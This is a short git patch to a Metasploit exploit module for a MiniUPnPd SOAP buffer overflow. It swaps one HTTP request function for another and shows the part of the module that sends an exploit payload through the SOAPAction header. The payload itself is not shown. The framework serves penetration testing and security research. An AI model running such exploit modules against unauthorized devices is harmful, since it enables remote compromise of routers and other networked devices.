From 36f275d71affb81497f23f97296505c6f195a43b Mon Sep 17 00:00:00 2001 From: Dejan Lukan Date: Mon, 3 Jun 2013 10:06:24 +0200 Subject: [PATCH] Changed the send_request_raw into send_request_cgi function. --- modules/exploits/multi/upnp/miniupnpd_soap_bof.rb | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/modules/exploits/multi/upnp/miniupnpd_soap_bof.rb b/modules/exploits/multi/upnp/miniupnpd_soap_bof.rb index c6f5fa24ca..45868d6ce5 100644 --- a/modules/exploits/multi/upnp/miniupnpd_soap_bof.rb +++ b/modules/exploits/multi/upnp/miniupnpd_soap_bof.rb @@ -107,9 +107,9 @@ class Metasploit3 < Msf::Exploit::Remote # Build and send the HTTP request # print_status("Sending exploit to victim #{target.name} at ...") - send_request_raw({ - 'uri' => target_uri.path, + send_request_cgi({ 'method' => 'POST', + 'uri' => target_uri.path, 'headers' => { 'SOAPAction' => sploit, #'User-Agent' => 'Python-urllib/2.7',